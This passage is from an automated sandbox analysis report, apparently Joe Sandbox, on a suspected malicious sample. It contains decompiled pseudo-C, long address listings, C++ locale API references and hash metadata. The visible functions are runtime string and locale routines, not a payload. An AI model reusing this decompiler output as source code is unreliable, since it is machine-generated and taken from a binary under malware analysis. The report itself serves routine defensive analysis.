																																			_t570 = 0x7fffffff;
																																			L152:
																																			_t364 = 0xffffffff80000023;
																																			__eflags = 0x80000000;
																																			L153:
																																			_t365 = E0041362C(_t466, _t550, _t570, __eflags, _t364);
																																			_t625 = _t625 + 4;
																																			__eflags = _t365;
																																			if(_t365 == 0) {
																																				L171:
																																				_t280 = E0041805F(_t466, _t509, _t541);
																																				asm("int3");
																																				asm("int3");
																																				asm("int3");
																																				asm("int3");
																																				asm("int3");
																																				_t482 =  *_t509;
																																				__eflags = _t482;
																																				if(_t482 != 0) {
																																					_push(_t550);
																																					_t559 = _t482;
																																					_t510 =  *_t559;
																																					if(_t510 == 0) {
																																						L6:
																																						return _t280;
																																					} else {
																																						_push(_t570);
																																						_push(_t510);
																																						L93();
																																						_t582 =  *_t559;
																																						_t514 = (0x2aaaaaab * ( *(_t559 + 8) - _t582) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t559 + 8) - _t582) >> 0x20 >> 2) + ((0x2aaaaaab * ( *(_t559 + 8) - _t582) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t559 + 8) - _t582) >> 0x20 >> 2)) * 2 << 3;
																																						if(_t514 < 0x1000) {
																																							L5:
																																							_push(_t514);
																																							_t280 = E004138AD(_t582);
																																							 *_t559 = 0;
																																							 *(_t559 + 4) = 0;
																																							 *(_t559 + 8) = 0;
																																							goto L6;
																																						} else {
																																							_t545 =  *((intOrPtr*)(_t582 - 4));
																																							_t514 = _t514 + 0x23;
																																							_t584 = _t582 - _t545;
																																							if(_t584 - 4 > 0x1f) {
																																								E0041805F(_t466, _t514, _t545);
																																								asm("int3");
																																								asm("int3");
																																								asm("int3");
																																								asm("int3");
																																								asm("int3");
																																								asm("int3");
																																								asm("int3");
																																								asm("int3");
																																								asm("int3");
																																								asm("int3");
																																								asm("int3");
																																								asm("int3");
																																								_push(_t606);
																																								__eflags = _v356 & 0x00000001;
																																								_push(_t584);
																																								_t585 = _t514;
																																								 *_t585 = 0x4337e4;
																																								if((_v356 & 0x00000001) != 0) {
																																									_push(8);
																																									E004138AD(_t585);
																																								}
																																								return _t585;
																																							} else {
																																								_t582 = _t545;
																																								goto L5;
																																							}
																																						}
																																					}
																																				} else {
																																					return _t280;
																																				}
																																			} else {
																																				_t541 = _v32;
																																				_t250 = _t365 + 0x23; // 0x23
																																				_t550 = _t250 & 0xffffffe0;
																																				 *(_t550 - 4) = _t365;
																																				L163:
																																				_t466[4] = _v36;
																																				_v32 = _v8;
																																				_t466[5] = _t570;
																																				_t589 = _t550 + _t541;
																																				_v44 = _t589;
																																				__eflags = _v40 - 0x10;
																																				_v36 = _v12 + _t589;
																																				_push(_t541);
																																				if(_v40 < 0x10) {
																																					_push(_t466);
																																					_push(_t550);
																																					E00414BF0();
																																					E00415180(_t550, _t589, _v32, _v12);
																																					 *_v36 = 0;
																																					 *_t466 = _t550;
																																					return _t466;
																																				} else {
																																					_t591 =  *_t466;
																																					_push(_t591);
																																					_push(_t550);
																																					E00414BF0();
																																					E00415180(_t550, _v44, _v32, _v12);
																																					_t625 = _t625 + 0x18;
																																					_t516 = _v40 + 1;
																																					 *_v36 = 0;
																																					__eflags = _t516 - 0x1000;
																																					if(_t516 < 0x1000) {
																																						L167:
																																						_push(_t516);
																																						E004138AD(_t591);
																																						 *_t466 = _t550;
																																						return _t466;
																																					} else {
																																						_t541 =  *(_t591 - 4);
																																						_t509 = _t516 + 0x23;
																																						_t570 = _t591 - _t541;
																																						_t271 = _t570 - 4; // 0x7ffffffb
																																						__eflags = _t271 - 0x1f;
																																						if(_t271 > 0x1f) {
																																							goto L171;
																																						} else {
																																							_t591 = _t541;
																																							goto L167;
																																						}
																																					}
																																				}
																																			}
																																		}
																																	}
																																} else {
																																	_t540 = _v28;
																																	_t210 = _t388 + 0x23; // 0x23
																																	_t550 = _t210 & 0xffffffe0;
																																	 *(_t550 - 4) = _t388;
																																	L140:
																																	_t475[4] = _v32;
																																	_v28 = _v0;
																																	_t373 = _v8;
																																	_t475[5] = _t581;
																																	_push(_t373);
																																	_v40 = _t540 - _t373 + 1;
																																	_t595 = _t550 + _t373;
																																	_v44 = _t595;
																																	__eflags = _v36 - 0x10;
																																	_v32 = _v4 + _t595;
																																	if(_v36 < 0x10) {
																																		_push(_t475);
																																		_push(_t550);
																																		E00414BF0();
																																		E00415180(_t550, _t595, _v28, _v4);
																																		__eflags = _t475 + _v8;
																																		E00414BF0(_v32, _t475 + _v8, _v40);
																																		 *_t475 = _t550;
																																		return _t475;
																																	} else {
																																		_t597 =  *_t475;
																																		_push(_t597);
																																		_push(_t550);
																																		E00414BF0();
																																		E00415180(_t550, _v44, _v28, _v4);
																																		E00414BF0(_v32, _v8 + _t597, _v40);
																																		_t635 = _t635 + 0x24;
																																		_t523 = _v36 + 1;
																																		__eflags = _t523 - 0x1000;
																																		if(_t523 < 0x1000) {
																																			L144:
																																			_push(_t523);
																																			E004138AD(_t597);
																																			 *_t475 = _t550;
																																			return _t475;
																																		} else {
																																			_t540 =  *(_t597 - 4);
																																			_t508 = _t523 + 0x23;
																																			_t581 = _t597 - _t540;
																																			_t236 = _t581 - 4; // 0x7ffffffb
																																			__eflags = _t236 - 0x1f;
																																			if(_t236 > 0x1f) {
																																				goto L148;
																																			} else {
																																				_t597 = _t540;
																																				goto L144;
																																			}
																																		}
																																	}
																																}
																															}
																														}
																													} else {
																														_t539 = _v24;
																														_t180 = _t404 + 0x23; // 0x23
																														_t550 = _t180 & 0xffffffe0;
																														 *(_t550 - 4) = _t404;
																														L117:
																														__eflags = _v28 - 0x10;
																														_t474[4] = _v32;
																														_t474[5] = _t580;
																														_push(_t539);
																														if(_v28 < 0x10) {
																															_push(_t474);
																															_push(_t550);
																															E00414BF0();
																															_t547 = _v24;
																															 *((char*)(_t550 + _t547)) = _v4;
																															 *((char*)(_t550 + _t547 + 1)) = 0;
																															 *_t474 = _t550;
																															return _t474;
																														} else {
																															_t602 =  *_t474;
																															_push(_t602);
																															_push(_t550);
																															E00414BF0();
																															_t548 = _v24;
																															_t634 = _t634 + 0xc;
																															_t526 = _v28 + 1;
																															 *((char*)(_t550 + _t548)) = _v4;
																															 *((char*)(_t550 + _t548 + 1)) = 0;
																															__eflags = _t526 - 0x1000;
																															if(_t526 < 0x1000) {
																																L121:
																																_push(_t526);
																																E004138AD(_t602);
																																 *_t474 = _t550;
																																return _t474;
																															} else {
																																_t539 =  *(_t602 - 4);
																																_t507 = _t526 + 0x23;
																																_t580 = _t602 - _t539;
																																_t196 = _t580 - 4; // 0x7ffffffb
																																__eflags = _t196 - 0x1f;
																																if(_t196 > 0x1f) {
																																	goto L125;
																																} else {
																																	_t602 = _t539;
																																	goto L121;
																																}
																															}
																														}
																													}
																												}
																											}
																										} else {
																											_t318 = _t538;
																											goto L99;
																										}
																									}
																								}
																								goto L174;
																								L100:
																								 *(_t578 + 0x10) = 0;
																								 *((intOrPtr*)(_t578 + 0x14)) = 0xf;
																								 *_t578 = 0;
																								_t578 = _t578 + 0x18;
																								__eflags = _t578 - _t550;
																							} while (_t578 != _t550);
																							goto L101;
																						}
																					} else {
																						_t576 = _v44;
																						_v36 = _t576;
																						_v16 = 1;
																						E0041262E(__eflags, _t576);
																						_t537 =  *_t576;
																						 *((intOrPtr*)( *_t576 + 4))();
																						 *0x444f40 = _t576;
																						goto L91;
																					}
																				} else {
																					_t576 = _t472;
																					goto L91;
																				}
																			} else {
																				_t576 =  *(_v32 +  *((intOrPtr*)(_t408 + 8)));
																				goto L86;
																			}
																		}
																	}
																}
															} else {
																E00412760( &_v92,  &_v92, _t555);
																 *(_t573 + 4) = 0;
																 *_t573 = 0x434418;
																_v12 = 9;
																E004127AB( &_v92,  &_v92);
																_t419 = _v48;
																_t652 = _t630 + 0xc;
																__eflags = _t419;
																if(_t419 != 0) {
																	E0041AC1E(_t419);
																	_t652 = _t652 + 4;
																}
																_t420 = _v56;
																_v48 = 0;
																__eflags = _t420;
																if(_t420 != 0) {
																	E0041AC1E(_t420);
																	_t652 = _t652 + 4;
																}
																_t421 = _v64;
																_v56 = 0;
																__eflags = _t421;
																if(_t421 != 0) {
																	E0041AC1E(_t421);
																	_t652 = _t652 + 4;
																}
																_t422 = _v72;
																_v64 = 0;
																__eflags = _t422;
																if(_t422 != 0) {
																	E0041AC1E(_t422);
																	_t652 = _t652 + 4;
																}
																_t423 = _v80;
																_v72 = 0;
																__eflags = _t423;
																if(_t423 != 0) {
																	E0041AC1E(_t423);
																	_t652 = _t652 + 4;
																}
																_t424 = _v88;
																_v80 = 0;
																__eflags = _t424;
																if(_t424 != 0) {
																	E0041AC1E(_t424);
																	_t652 = _t652 + 4;
																}
																_v88 = 0;
																E004124D5( &_v92);
																_v28 = _t573;
																_v12 = 0xa;
																E0041262E(__eflags, _t573);
																 *((intOrPtr*)( *_t573 + 4))();
																 *0x444f44 = _t573;
																goto L48;
															}
														} else {
															_t573 = _t300;
															goto L48;
														}
													} else {
														_t573 =  *(_t470 +  *((intOrPtr*)(_t435 + 8)));
														goto L53;
													}
												}
											} else {
												L48:
												E004124D5( &_v32);
												 *[fs:0x0] = _v20;
												_pop(_t554);
												_pop(_t574);
												_pop(_t471);
												__eflags = _v24 ^ _t608;
												return E0041361E(_t573, _t471, _v24 ^ _t608, _t536, _t554, _t574);
											}
										}
									} else {
										E00412760( &_v88,  &_v88, _t552);
										 *(_t571 + 4) = 0;
										 *_t571 = 0x43446c;
										_v8 = 9;
										E004127AB( &_v88,  &_v88);
										_t446 = _v44;
										_t654 = _t627 + 0xc;
										__eflags = _t446;
										if(_t446 != 0) {
											E0041AC1E(_t446);
											_t654 = _t654 + 4;
										}
										_t447 = _v52;
										_v44 = 0;
										__eflags = _t447;
										if(_t447 != 0) {
											E0041AC1E(_t447);
											_t654 = _t654 + 4;
										}
										_t448 = _v60;
										_v52 = 0;
										__eflags = _t448;
										if(_t448 != 0) {
											E0041AC1E(_t448);
											_t654 = _t654 + 4;
										}
										_t449 = _v68;
										_v60 = 0;
										__eflags = _t449;
										if(_t449 != 0) {
											E0041AC1E(_t449);
											_t654 = _t654 + 4;
										}
										_t450 = _v76;
										_v68 = 0;
										__eflags = _t450;
										if(_t450 != 0) {
											E0041AC1E(_t450);
											_t654 = _t654 + 4;
										}
										_t451 = _v84;
										_v76 = 0;
										__eflags = _t451;
										if(_t451 != 0) {
											E0041AC1E(_t451);
											_t654 = _t654 + 4;
										}
										_v84 = 0;
										E004124D5( &_v88);
										_v24 = _t571;
										_v8 = 0xa;
										E0041262E(__eflags, _t571);
										 *((intOrPtr*)( *_t571 + 4))();
										 *0x444f4c = _t571;
										goto L15;
									}
								} else {
									_t571 = _t284;
									goto L15;
								}
							} else {
								_t571 =  *(_t467 +  *((intOrPtr*)(_t462 + 8)));
								goto L20;
							}
						}
					} else {
						L15:
						E004124D5( &_v28);
						 *[fs:0x0] = _v16;
						_pop(_t551);
						_pop(_t572);
						_pop(_t468);
						__eflags = _v20 ^ _t606;
						return E0041361E(_t571, _t468, _v20 ^ _t606, _t536, _t551, _t572);
					}
				}
				L174:
			}

0x00408400
0x00408400
0x00408401
0x00408403
0x00408405
0x00408410
0x00408411
0x00408414
0x00408419
0x0040841b
0x0040841e
0x0040841f
0x00408420
0x00408421
0x00408425
0x0040842b
0x0040842b
0x0040842e
0x00408433
0x00408436
0x0040843b
0x00408442
0x00408448
0x0040844d
0x00408452
0x00408455
0x00408458
0x0040845d
0x00408463
0x00408465
0x0040846a
0x0040846a
0x0040846b
0x00408470
0x00408470
0x00408475
0x00408478
0x0040847d
0x0040847d
0x00408483
0x00408486
0x0040848d
0x00408490
0x004084c2
0x004084c2
0x00000000
0x00408492
0x00408495
0x00408498
0x0040849a
0x004084c4
0x004084c4
0x004084c8
0x004084da
0x004084da
0x004084dc
0x00000000
0x00000000
0x00000000
0x00000000
0x004084ca
0x004084ca
0x004084cf
0x004084d2
0x004084de
0x004084de
0x004084e1
0x004084e3
0x004084f0
0x004084f2
0x004084f5
0x004084fb
0x004084fb
0x004084fe
0x00408500
0x0040850e
0x00408502
0x00408502
0x00408505
0x00408507
0x00408509
0x00408509
0x00408509
0x00408507
0x00408518
0x0040851d
0x00408524
0x00408528
0x0040852f
0x00408535
0x0040853c
0x00408540
0x00408543
0x00408547
0x0040854a
0x0040854d
0x00408550
0x00408553
0x00408557
0x00408559
0x0040863f
0x00408644
0x00408645
0x00408646
0x00408647
0x00408648
0x00408649
0x0040864a
0x0040864b
0x0040864c
0x0040864d
0x0040864e
0x0040864f
0x00408650
0x00408651
0x00408653
0x00408655
0x00408660
0x00408661
0x00408664
0x00408669
0x0040866b
0x0040866e
0x0040866f
0x00408670
0x00408671
0x00408675
0x0040867b
0x00408683
0x00408686
0x0040868b
0x00408692
0x00408698
0x0040869d
0x004086a0
0x004086a2
0x004086a8
0x004086ad
0x004086b3
0x004086b5
0x004086ba
0x004086ba
0x004086bb
0x004086c0
0x004086c0
0x004086c8
0x004086cd
0x004086cd
0x004086d3
0x004086d3
0x004086d6
0x004086dd
0x004086e0
0x00408712
0x00408712
0x00000000
0x004086e2
0x004086e5
0x004086e8
0x004086ea
0x00408714
0x00408714
0x00408718
0x0040872a
0x0040872a
0x0040872c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040871a
0x0040871a
0x0040871f
0x00408722
0x0040872e
0x0040872e
0x00408731
0x00408733
0x00408740
0x00408742
0x00408745
0x0040874b
0x0040874b
0x0040874e
0x00408750
0x0040875e
0x00408752
0x00408752
0x00408755
0x00408757
0x00408759
0x00408759
0x00408759
0x00408757
0x00408768
0x0040876d
0x00408774
0x00408778
0x0040877f
0x00408785
0x0040878c
0x00408790
0x00408793
0x00408797
0x0040879a
0x0040879d
0x004087a0
0x004087a3
0x004087a7
0x004087a9
0x0040888f
0x00408894
0x00408895
0x00408896
0x00408897
0x00408898
0x00408899
0x0040889a
0x0040889b
0x0040889c
0x0040889d
0x0040889e
0x0040889f
0x004088a0
0x004088a1
0x004088a3
0x004088a5
0x004088b0
0x004088b1
0x004088b4
0x004088b9
0x004088bb
0x004088be
0x004088bf
0x004088c0
0x004088c1
0x004088c5
0x004088cb
0x004088d3
0x004088d6
0x004088db
0x004088e2
0x004088e8
0x004088ee
0x004088f1
0x004088f3
0x004088f9
0x004088fe
0x00408904
0x00408906
0x0040890b
0x0040890b
0x0040890c
0x00408911
0x00408911
0x00408919
0x0040891e
0x0040891e
0x00408924
0x00408927
0x0040892e
0x00408931
0x00408934
0x00408942
0x00408942
0x00408944
0x00000000
0x00408936
0x00408939
0x0040893c
0x0040893e
0x004089a0
0x004089a3
0x004089ad
0x004089b5
0x004089b6
0x004089b7
0x004089bb
0x004089c5
0x00408940
0x00408947
0x00408947
0x0040894b
0x00408960
0x00408960
0x00408962
0x00000000
0x00000000
0x00000000
0x00000000
0x0040894d
0x0040894d
0x00408952
0x00408955
0x00408964
0x00408964
0x00408966
0x00408973
0x00408978
0x0040897b
0x0040897e
0x004089c6
0x004089cb
0x004089cc
0x004089cd
0x004089ce
0x004089cf
0x004089d0
0x004089d1
0x004089d3
0x004089d4
0x004089d5
0x004089d7
0x004089d9
0x004089db
0x00408a27
0x00408a2a
0x004089e0
0x004089e0
0x004089e0
0x004089e3
0x004089e6
0x00000000
0x004089e8
0x004089e8
0x004089ea
0x004089eb
0x004089f1
0x00408a05
0x00408a05
0x00408a07
0x00408a0c
0x00000000
0x004089f3
0x004089f3
0x004089f6
0x004089fe
0x00408a01
0x00408a2b
0x00408a30
0x00408a31
0x00408a32
0x00408a33
0x00408a34
0x00408a35
0x00408a36
0x00408a37
0x00408a38
0x00408a39
0x00408a3a
0x00408a3b
0x00408a3c
0x00408a3d
0x00408a3e
0x00408a3f
0x00408a40
0x00408a41
0x00408a43
0x00408a46
0x00408a47
0x00408a49
0x00408a50
0x00408a51
0x00408a54
0x00408a59
0x00408a5c
0x00408a5d
0x00408a5f
0x00408b6d
0x00000000
0x00408a65
0x00408a65
0x00408a68
0x00408a6d
0x00408a70
0x00408a73
0x00408a76
0x00408a78
0x00408aa5
0x00408aa7
0x00408aa9
0x00408aab
0x00408ab4
0x00408ab6
0x00408ab8
0x00408abb
0x00408abb
0x00408abe
0x00408ac4
0x00408ad3
0x00408ad5
0x00408ae7
0x00408ae7
0x00408ad7
0x00408ad8
0x00408add
0x00408ae0
0x00408ae3
0x00408ae3
0x00000000
0x00408ac6
0x00408ac6
0x00408ac6
0x00408ac9
0x00408acb
0x00408b72
0x00408b72
0x00000000
0x00408ad1
0x00000000
0x00408ad1
0x00408acb
0x00408aad
0x00408aad
0x00000000
0x00408aad
0x00408a7a
0x00408a7a
0x00408a7c
0x00408a81
0x00408a81
0x00408a84
0x00408a85
0x00408a8a
0x00408a8d
0x00408a8f
0x00408b77
0x00408b77
0x00408b7c
0x00408b7d
0x00408b7e
0x00408b7f
0x00408b80
0x00408b81
0x00408b83
0x00408b86
0x00408b87
0x00408b89
0x00408b90
0x00408b91
0x00408b94
0x00408b99
0x00408b9c
0x00408b9d
0x00408b9f
0x00408ced
0x00000000
0x00408ba5
0x00408ba5
0x00408ba8
0x00408bad
0x00408bb0
0x00408bb3
0x00408bb6
0x00408bb8
0x00408be5
0x00408be7
0x00408be9
0x00408beb
0x00408bf4
0x00408bf6
0x00408bf8
0x00408bfb
0x00408bfb
0x00408bfe
0x00408c04
0x00408c13
0x00408c15
0x00408c27
0x00408c27
0x00408c17
0x00408c18
0x00408c1d
0x00408c20
0x00408c23
0x00408c23
0x00000000
0x00408c06
0x00408c06
0x00408c06
0x00408c09
0x00408c0b
0x00408cf2
0x00408cf2
0x00000000
0x00408c11
0x00000000
0x00408c11
0x00408c0b
0x00408bed
0x00408bed
0x00000000
0x00408bed
0x00408bba
0x00408bba
0x00408bbc
0x00408bc1
0x00408bc1
0x00408bc4
0x00408bc5
0x00408bca
0x00408bcd
0x00408bcf
0x00408cf7
0x00408cf7
0x00408cfc
0x00408cfd
0x00408cfe
0x00408cff
0x00408d00
0x00408d01
0x00408d03
0x00408d06
0x00408d07
0x00408d09
0x00408d10
0x00408d11
0x00408d14
0x00408d19
0x00408d1c
0x00408d1d
0x00408d1f
0x00408e4c
0x00000000
0x00408d25
0x00408d25
0x00408d28
0x00408d2d
0x00408d30
0x00408d33
0x00408d36
0x00408d38
0x00408d65
0x00408d67
0x00408d69
0x00408d6b
0x00408d74
0x00408d76
0x00408d78
0x00408d7b
0x00408d7b
0x00408d7e
0x00408d84
0x00408d93
0x00408d95
0x00408da7
0x00408da7
0x00408d97
0x00408d98
0x00408d9d
0x00408da0
0x00408da3
0x00408da3
0x00000000
0x00408d86
0x00408d86
0x00408d86
0x00408d89
0x00408d8b
0x00408e51
0x00408e51
0x00000000
0x00408d91
0x00000000
0x00408d91
0x00408d8b
0x00408d6d
0x00408d6d
0x00000000
0x00408d6d
0x00408d3a
0x00408d3a
0x00408d3c
0x00408d41
0x00408d41
0x00408d44
0x00408d45
0x00408d4a
0x00408d4d
0x00408d4f
0x00408e56
0x00408e56
0x00408e5b
0x00408e5c
0x00408e5d
0x00408e5e
0x00408e5f
0x00408e60
0x00408e62
0x00408e64
0x004071d0
0x004071d1
0x004071d3
0x004071d7
0x0040723d
0x0040723e
0x004071d9
0x004071dc
0x004071dd
0x004071de
0x004071eb
0x00407201
0x0040720a
0x0040721e
0x0040721e
0x00407220
0x00407228
0x0040722e
0x00407235
0x00000000
0x0040720c
0x0040720c
0x0040720f
0x00407212
0x0040721a
0x0040723f
0x00407244
0x00407245
0x00407246
0x00407247
0x00407248
0x00407249
0x0040724a
0x0040724b
0x0040724c
0x0040724d
0x0040724e
0x0040724f
0x00407250
0x00407253
0x00407257
0x00407258
0x0040725a
0x00407260
0x00407262
0x00407265
0x0040726a
0x00407271
0x0040721c
0x0040721c
0x00000000
0x0040721c
0x0040721a
0x0040720a
0x00408e6a
0x00408e6a
0x00408e6a
0x00408d55
0x00408d55
0x00408d58
0x00408d5b
0x00408d5e
0x00408da9
0x00408dac
0x00408db3
0x00408db9
0x00408dbc
0x00408dc1
0x00408dc4
0x00408dc8
0x00408dcb
0x00408dcc
0x00408e23
0x00408e24
0x00408e25
0x00408e31
0x00408e3c
0x00408e41
0x00408e49
0x00408dce
0x00408dce
0x00408dd0
0x00408dd1
0x00408dd2
0x00408de0
0x00408de8
0x00408dee
0x00408def
0x00408df2
0x00408df8
0x00408e0c
0x00408e0c
0x00408e0e
0x00408e16
0x00408e20
0x00408dfa
0x00408dfa
0x00408dfd
0x00408e00
0x00408e02
0x00408e05
0x00408e08
0x00000000
0x00408e0a
0x00408e0a
0x00000000
0x00408e0a
0x00408e08
0x00408df8
0x00408dcc
0x00408d4f
0x00408d38
0x00408bd5
0x00408bd5
0x00408bd8
0x00408bdb
0x00408bde
0x00408c29
0x00408c2c
0x00408c33
0x00408c36
0x00408c3b
0x00408c3e
0x00408c42
0x00408c45
0x00408c4d
0x00408c50
0x00408c54
0x00408c57
0x00408cb9
0x00408cba
0x00408cbb
0x00408cc7
0x00408cd2
0x00408cd8
0x00408ce0
0x00408cea
0x00408c59
0x00408c59
0x00408c5b
0x00408c5c
0x00408c5d
0x00408c6b
0x00408c7c
0x00408c84
0x00408c87
0x00408c88
0x00408c8e
0x00408ca2
0x00408ca2
0x00408ca4
0x00408cac
0x00408cb6
0x00408c90
0x00408c90
0x00408c93
0x00408c96
0x00408c98
0x00408c9b
0x00408c9e
0x00000000
0x00408ca0
0x00408ca0
0x00000000
0x00408ca0
0x00408c9e
0x00408c8e
0x00408c57
0x00408bcf
0x00408bb8
0x00408a95
0x00408a95
0x00408a98
0x00408a9b
0x00408a9e
0x00408ae9
0x00408ae9
0x00408af0
0x00408af3
0x00408af6
0x00408af7
0x00408b48
0x00408b49
0x00408b4a
0x00408b4f
0x00408b5a
0x00408b5d
0x00408b62
0x00408b6a
0x00408af9
0x00408af9
0x00408afb
0x00408afc
0x00408afd
0x00408b02
0x00408b05
0x00408b0e
0x00408b0f
0x00408b12
0x00408b17
0x00408b1d
0x00408b31
0x00408b31
0x00408b33
0x00408b3b
0x00408b45
0x00408b1f
0x00408b1f
0x00408b22
0x00408b25
0x00408b27
0x00408b2a
0x00408b2d
0x00000000
0x00408b2f
0x00408b2f
0x00000000
0x00408b2f
0x00408b2d
0x00408b1d
0x00408af7
0x00408a8f
0x00408a78
0x00408a03
0x00408a03
0x00000000
0x00408a03
0x00408a01
0x004089f1
0x00000000
0x00408a0f
0x00408a0f
0x00408a16
0x00408a1d
0x00408a20
0x00408a23
0x00408a23
0x00000000
0x004089e0
0x00408980
0x00408980
0x00408983
0x00408987
0x0040898b
0x00408990
0x00408997
0x0040899a
0x00000000
0x0040899a
0x00408968
0x00408968
0x00000000
0x00408968
0x00408957
0x0040895d
0x00000000
0x0040895d
0x00408955
0x0040894b
0x0040893e
0x004087af
0x004087b4
0x004087b9
0x004087c0
0x004087c9
0x004087ce
0x004087d3
0x004087d6
0x004087d9
0x004087db
0x004087de
0x004087e3
0x004087e3
0x004087e6
0x004087e9
0x004087f0
0x004087f2
0x004087f5
0x004087fa
0x004087fa
0x004087fd
0x00408800
0x00408807
0x00408809
0x0040880c
0x00408811
0x00408811
0x00408814
0x00408817
0x0040881e
0x00408820
0x00408823
0x00408828
0x00408828
0x0040882b
0x0040882e
0x00408835
0x00408837
0x0040883a
0x0040883f
0x0040883f
0x00408842
0x00408845
0x0040884c
0x0040884e
0x00408851
0x00408856
0x00408856
0x0040885c
0x00408863
0x00408868
0x0040886c
0x00408870
0x0040887c
0x0040887f
0x00000000
0x0040887f
0x00408735
0x00408735
0x00000000
0x00408735
0x00408724
0x00408727
0x00000000
0x00408727
0x00408722
0x004086ec
0x004086ec
0x004086ef
0x004086f9
0x00408701
0x00408702
0x00408703
0x00408707
0x00408711
0x00408711
0x004086ea
0x0040855f
0x00408564
0x00408569
0x00408570
0x00408579
0x0040857e
0x00408583
0x00408586
0x00408589
0x0040858b
0x0040858e
0x00408593
0x00408593
0x00408596
0x00408599
0x004085a0
0x004085a2
0x004085a5
0x004085aa
0x004085aa
0x004085ad
0x004085b0
0x004085b7
0x004085b9
0x004085bc
0x004085c1
0x004085c1
0x004085c4
0x004085c7
0x004085ce
0x004085d0
0x004085d3
0x004085d8
0x004085d8
0x004085db
0x004085de
0x004085e5
0x004085e7
0x004085ea
0x004085ef
0x004085ef
0x004085f2
0x004085f5
0x004085fc
0x004085fe
0x00408601
0x00408606
0x00408606
0x0040860c
0x00408613
0x00408618
0x0040861c
0x00408620
0x0040862c
0x0040862f
0x00000000
0x0040862f
0x004084e5
0x004084e5
0x00000000
0x004084e5
0x004084d4
0x004084d7
0x00000000
0x004084d7
0x004084d2
0x0040849c
0x0040849c
0x0040849f
0x004084a9
0x004084b1
0x004084b2
0x004084b3
0x004084b7
0x004084c1
0x004084c1
0x0040849a
0x00000000

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00408436
std::_Lockit::_Lockit.LIBCPMT ref: 00408458
std::_Lockit::~_Lockit.LIBCPMT ref: 00408478
std::_Lockit::~_Lockit.LIBCPMT ref: 0040849F
std::_Lockit::_Lockit.LIBCPMT ref: 00408518
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00408564
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040857E
std::_Lockit::~_Lockit.LIBCPMT ref: 00408613
std::_Facet_Register.LIBCPMT ref: 00408620

Part of subcall function 00412430: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041243C

Strings

Pr@, xrefs: 00408570
y<@, xrefs: 0040842B
bad locale name, xrefs: 0040863A

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
String ID: Pr@$bad locale name$y<@
API String ID: 1592514138-1561844833
Opcode ID: dd8b2413e9274e4936afaf7fd6e941dea872091d8f56f02c7d2c99a652526c38
Instruction ID: eee323774e020d7eb017d28b1302df44cf36fb0ce7af8f549eb97eee52ec8172
Opcode Fuzzy Hash: dd8b2413e9274e4936afaf7fd6e941dea872091d8f56f02c7d2c99a652526c38
Instruction Fuzzy Hash: 1361ADB0D00249DBDB10DFA5DA45BDEBBB4AF54314F14402EE845BB381EB78A948CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00408650 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00408650(void* __ebx, void* __edx, void* __edi, signed int __esi, signed int* _a4) {
				char _v0;
				char _v4;
				signed int _v8;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				signed int _v52;
				short _v56;
				signed int _v60;
				short _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				char _v80;
				signed int _v84;
				char _v88;
				intOrPtr _v100;
				signed int _v112;
				char _v120;
				signed int _v124;
				intOrPtr _v132;
				char _v136;
				signed int _v140;
				signed int _v160;
				signed int _v172;
				signed int _v184;
				signed int _v196;
				signed int _v216;
				signed int _v228;
				signed int _v252;
				signed int _t215;
				signed int _t216;
				signed int _t219;
				signed int _t223;
				signed int _t226;
				signed int _t231;
				signed int _t232;
				void* _t239;
				void* _t240;
				intOrPtr _t241;
				signed int _t268;
				unsigned int _t270;
				void* _t271;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				unsigned int _t292;
				void* _t293;
				intOrPtr _t296;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				unsigned int _t315;
				void* _t316;
				signed int _t325;
				signed int _t327;
				void* _t331;
				signed int _t336;
				signed int _t337;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				void* _t358;
				signed int* _t362;
				signed int _t363;
				void* _t364;
				signed int _t365;
				void* _t366;
				signed int* _t367;
				signed int* _t368;
				signed int _t376;
				signed int _t384;
				intOrPtr _t390;
				signed int* _t391;
				void* _t395;
				signed int _t399;
				void* _t401;
				void* _t408;
				void* _t411;
				void* _t417;
				intOrPtr _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				intOrPtr _t426;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				void* _t432;
				signed int _t433;
				signed int _t434;
				void* _t435;
				signed int _t437;
				signed int _t449;
				void* _t450;
				intOrPtr _t451;
				signed int _t452;
				void* _t453;
				signed int _t454;
				signed int _t456;
				signed int _t457;
				intOrPtr _t458;
				void* _t460;
				signed int _t461;
				signed int _t464;
				signed int _t465;
				signed int _t467;
				signed int _t470;
				signed int _t471;
				signed int _t473;
				signed int _t476;
				signed int _t478;
				signed int _t482;
				signed int _t484;
				void* _t486;
				void* _t488;
				void* _t489;
				signed int _t498;
				void* _t499;
				signed int _t501;
				void* _t502;
				void* _t504;
				void* _t505;
				signed int _t506;
				void* _t523;

				_t448 = __esi;
				_t417 = __edx;
				_t482 = _t498;
				_push(0xffffffff);
				_push(0x431c0c);
				_push( *[fs:0x0]);
				_t499 = _t498 - 0x48;
				_t215 =  *0x443048; // 0x35200185
				_t216 = _t215 ^ _t482;
				_v20 = _t216;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t216);
				 *[fs:0x0] =  &_v16;
				_t362 = _a4;
				_t375 =  &_v28;
				_v24 = _t362;
				E0041247D( &_v28, 0);
				_v8 = 0;
				_t431 =  *0x444fc8; // 0x0
